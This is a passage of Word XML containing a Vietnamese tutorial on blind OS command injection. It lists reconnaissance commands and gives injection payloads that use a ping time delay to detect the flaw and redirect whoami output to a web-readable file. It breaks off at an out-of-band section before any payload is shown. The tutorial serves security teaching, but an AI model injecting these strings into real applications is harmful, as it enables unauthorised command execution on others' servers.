          <w:p w14:paraId="5C4B4B29"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netstat -an </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w14:paraId="37E80070" w14:textId="77777777" w:rsidTr="009B3BAC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="471D5180"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Running processes </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ACC7B55"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ps -ef </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21A451EF" w14:textId="77777777" w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w:rsidRDefault="009B3BAC" w:rsidP="009B3BAC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B3BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">tasklist </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CCB5A0F" w14:textId="6DD296BE" w:rsidR="009B3BAC" w:rsidRDefault="009B3BAC" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EDFA73" w14:textId="4D056998" w:rsidR="009B3BAC" w:rsidRPr="006B0231" w:rsidRDefault="009B3BAC" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0231">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind OS Command Injection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0CDD9" w14:textId="77777777" w:rsidR="006B0231" w:rsidRPr="006B0231" w:rsidRDefault="006B0231" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC1E39F" w14:textId="4BFE7C7A" w:rsidR="009B3BAC" w:rsidRDefault="00636825" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006D4D43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Rất nhiều trường hợp OS command injection là lỗ hổng mù. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0263F" w14:textId="31061E45" w:rsidR="006D4D43" w:rsidRDefault="00636825" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006D4D43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Xem xét 1 trang web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho phép người dùng phản hồi về trang web. Người dùng nhập địa chỉ email và tin nhắn phản hồi. Máy chủ ứng dụng web tạo 1 bức thư đến trang quản trị  bằng câu lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AFA794" w14:textId="77777777" w:rsidR="00636825" w:rsidRDefault="00636825" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A17241" w14:textId="3953FD23" w:rsidR="00636825" w:rsidRDefault="00636825" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636825">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mail -s "This site is great" -aFrom:peter@normal-user.net </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>feedback@vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66230393" w14:textId="684D12C4" w:rsidR="00636825" w:rsidRDefault="00636825" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD5C669" w14:textId="10D5F1AD" w:rsidR="00636825" w:rsidRDefault="00636825" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts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Kết quả từ câu lệnh mail sẽ không trả về cho người dùng. Vì vậy lệnh echo sẽ không hiệu quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA52647" w14:textId="2CBA66FB" w:rsidR="006B0231" w:rsidRDefault="006B0231" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060D8853" w14:textId="57A67DD7" w:rsidR="006B0231" w:rsidRDefault="006B0231" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0231">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Phát hiện lỗ hổng mù bằng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sự </w:t>
      </w:r>
      <w:r w:rsidRPr="006B0231">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trì hoãn thời gian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526BCC4B" w14:textId="0C8948F8" w:rsidR="006B0231" w:rsidRDefault="006B0231" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C0FEE8" w14:textId="127B3432" w:rsidR="006B0231" w:rsidRDefault="00A554CF" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006B0231">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bạn có thể tiêm lệnh kích hoạt sự chậm trễ thời gian, cho phép kiểm tra câu lệnh đã được kích hoạt dựa trên thời gian ứng dụng phản hồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0A19F" w14:textId="461C1AA6" w:rsidR="006B0231" w:rsidRDefault="00A554CF" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006B0231">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lệnh ping là 1 cách hiệu quả vì nó cho phép xác định </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chỉ số của gói icmp và cần thời gian để câu lệnh chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F371CDC" w14:textId="405AF37F" w:rsidR="00A554CF" w:rsidRDefault="00A554CF" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D2A0F1" w14:textId="797500C2" w:rsidR="00A554CF" w:rsidRDefault="00A554CF" w:rsidP="00A554CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A554CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; ping -c 10 127.0.0.1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB100F" w14:textId="7593D368" w:rsidR="00A554CF" w:rsidRDefault="00A554CF" w:rsidP="00A554CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65625A24" w14:textId="77777777" w:rsidR="00F80C48" w:rsidRDefault="00F80C48" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAAFCDE" w14:textId="1DD162A6" w:rsidR="00732F1E" w:rsidRDefault="00F80C48" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F80C48">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khai thác lỗ hổng mù</w:t>
      </w:r>
      <w:r w:rsidR="00732F1E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80C48">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3925372C" w14:textId="77777777" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367F192F" w14:textId="77777777" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0591BB" w14:textId="77777777" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4980ADC0" w14:textId="04C234FA" w:rsidR="006B0231" w:rsidRPr="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732F1E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00F80C48" w:rsidRPr="00732F1E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chuyển hướng đầu ra</w:t>
      </w:r>
      <w:r w:rsidRPr="00732F1E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157B69C" w14:textId="77777777" w:rsidR="006B0231" w:rsidRPr="00636825" w:rsidRDefault="006B0231" w:rsidP="00636825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF61C6F" w14:textId="35A9966F" w:rsidR="00636825" w:rsidRDefault="002D7ECB" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:rFonts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 xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00F80C48">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bạn có thể chuyển hướng kết quả của câu lệnh đến 1 tệp tin của ứng dụng mà bạn được phép truy cập. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4942BDAA" w14:textId="1532ADA4" w:rsidR="00F80C48" w:rsidRDefault="002D7ECB" w:rsidP="00F80C48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00F80C48">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: mã nguồn tĩnh ở </w:t>
      </w:r>
      <w:r w:rsidR="00F80C48" w:rsidRPr="00F80C48">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00F80C48" w:rsidRPr="00F80C48">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var/www/static</w:t>
      </w:r>
      <w:r w:rsidR="00F80C48">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, bạn có thể gửi đầu vào sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD339F" w14:textId="77777777" w:rsidR="00842655" w:rsidRDefault="00842655" w:rsidP="00F80C48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7CAA48" w14:textId="60121847" w:rsidR="00842655" w:rsidRDefault="00842655" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00842655">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; whoami &gt; /var/www/static/whoami.txt &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A3A81" w14:textId="21E3311F" w:rsidR="00842655" w:rsidRDefault="00842655" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E025F7" w14:textId="665D735D" w:rsidR="00842655" w:rsidRDefault="00842655" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kí tự &gt; gửi kết quả của câu lệnh whoami đến 1 file cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FAADA" w14:textId="1BEA2E89" w:rsidR="00B57279" w:rsidRDefault="00B57279" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0208003C" w14:textId="297716EA" w:rsidR="00B57279" w:rsidRDefault="00732F1E" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732F1E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. kích hoạt sự tương tác phía bên ngoài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6DC68" w14:textId="7A3273F8" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C97EA66" w14:textId="5852E066" w:rsidR="00732F1E" w:rsidRDefault="002D7ECB" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00732F1E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bạn có thể tiêm 1 lệnh để kích hoạt sự tương tác mạng với hệ thống bạn kiểm soát bằng phương pháp OAST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A917F3F" w14:textId="4ACB6243" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B45F69" w14:textId="7ABD03A0" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00732F1E">
      <w:pPr>
        <w:rPr>
